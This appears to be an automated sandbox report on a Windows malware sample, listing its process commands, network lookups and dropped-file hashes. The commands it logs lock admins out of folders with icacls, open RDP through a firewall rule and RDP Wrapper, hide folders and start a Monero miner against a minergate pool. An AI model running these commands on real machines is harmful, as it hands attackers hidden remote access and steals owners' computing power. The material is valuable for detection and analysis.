C:\Windows\system32\cmd.exe /c icacls C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8} /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\windowsnode /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\Cefunpacked /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\windowsnode /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\syswow64\xmr64 /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\hhsm /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\GOOGLE /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\syswow64\hhsm /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8} /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\Cefunpacked /deny Admin:(OI)(CI)(F)
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\syswow64\xmr64 /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\prefssecure /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\MicrosoftCorporation /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\tiser /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls D:\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls E:\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\prefssecure /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\MicrosoftCorporation /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\tiser /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls E:\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls D:\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls K:\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\disk /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Logs /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\windows\min /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls K:\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\hs_module /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\oracle /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\WindowsSQL /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\disk /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Logs /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\windows\min /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\oracle /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\hs_module /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\WindowsSQL /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\DirectX11b /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Framework /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\system32 /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\AudioHDriver /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\DirectX11b /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Framework /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\windowsdriver /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\WindowsDefender /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\DriversI /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\system32\hs /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\system32 /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\rss /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\AudioHDriver /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\windowsdriver /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\WindowsDefender /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\DriversI /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\system32\hs /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\rss /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\generictools /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\PCBooster /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\unityp /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\AMD /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\generictools /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\PCBooster /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\unityp /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\AMD /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\xmarin /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\comdev /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\wupdate /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\monotype /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\xpon /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\xmarin /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\comdev /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\wupdate /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\monotype /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\xpon /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\wmipr /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\kara /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\syslog /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\temp\wup /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\FileSystemDriver /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\wmipr /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\kara /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\syslog /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\temp\wup /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\FileSystemDriver /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\geckof /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\initwin /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\packagest /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\geckof /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\initwin /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\packagest /deny Admin:(OI)(CI)(F)
C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -w
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\subdir /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\syscore /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\windowscore /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Macromedia /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft software /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\SystemCertificates /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\subdir /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\Speech /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\coretempapp /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\kryptex /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\syscore /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\windowscore /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Macromedia /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft software /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\SystemCertificates /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft\Speech /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\coretempapp /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\kryptex /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\system /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\WindowsApps /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\WindowsHelper /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\windows defender /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\system /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\WindowsApps /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\network /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\WindowsHelper /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\gplyra /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\intel /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft\windows defender /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft\network /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\gplyra /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\intel /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\app /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Windows_x64_nheqminer-5c /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\isminer /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemcare /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\SIVapp /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\kyubey /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\app /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\isminer /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Windows_x64_nheqminer-5c /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\systemcare /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\SIVapp /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\kyubey /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\NSCPUCNMINER /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\performance /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\windows\system /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\performance /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\NSCPUCNMINER /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\AudioHDriver /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\performance /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft\windows\system /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\performance /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\AudioHDriver /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\bvhost /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\GoogleSoftware /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\setupsk /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Svcms /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\bvhost /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\crmsvc /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\setupsk /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\GoogleSoftware /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Svcms /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\crmsvc /deny Admin:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig /flushdns
C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c gpupdate /force
C:\Windows\system32\gpupdate.exe
gpupdate /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\rdp"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\users\john"
C:\ProgramData\WindowsTask\AppHost.exe
C:\ProgramData\WindowsTask\AppHost.exe -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] --donate-level=1 -p x -t4
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| US | 8.8.8.8:53 | freemail.freehost.com.ua | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| RU | 194.67.198.139:21 | | tcp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 8.8.8.8:53 | kaen.progaming-cheats.ru | udp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
Files
memory/1540-239-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1540-240-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1540-238-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1540-241-0x0000000000400000-0x0000000000AB9000-memory.dmp
C:\Programdata\Windows\rfusclient.exe
| MD5 | b8667a1e84567fcf7821bcefb6a444af |
| SHA1 | 9c1f91fe77ad357c8f81205d65c9067a270d61f0 |
| SHA256 | dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9 |
| SHA512 | ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852 |
memory/1284-270-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1284-272-0x0000000000400000-0x00000000009B6000-memory.dmp
C:\rdp\db.rar
| MD5 | a23a14afe5e691e9b1be447ad69b00f7 |
| SHA1 | a408ad57c19ba348aeb5a2f15feb66a027daa6a3 |
| SHA256 | a1c47dba95d777a5fbf00faa78d7b38073b4b8e739d4a68c297ce00919dd05e6 |
| SHA512 | c7ef548ca7a23b06db46d322d1a146b08489105018d69c255b2423008f684b066b6f58e2e568029ef2154e944d32dfb1836757bc7bb2cc999f2f3fcce48c5ff2 |
C:\rdp\Rar.exe
| MD5 | 2e86a9862257a0cf723ceef3868a1a12 |
| SHA1 | a4324281823f0800132bf13f5ad3860e6b5532c6 |
| SHA256 | 2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8 |
| SHA512 | 3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de |
memory/3260-292-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/5104-290-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/5104-289-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/5104-286-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/5104-285-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/5104-284-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1284-273-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1284-269-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1284-268-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1284-271-0x0000000000400000-0x00000000009B6000-memory.dmp
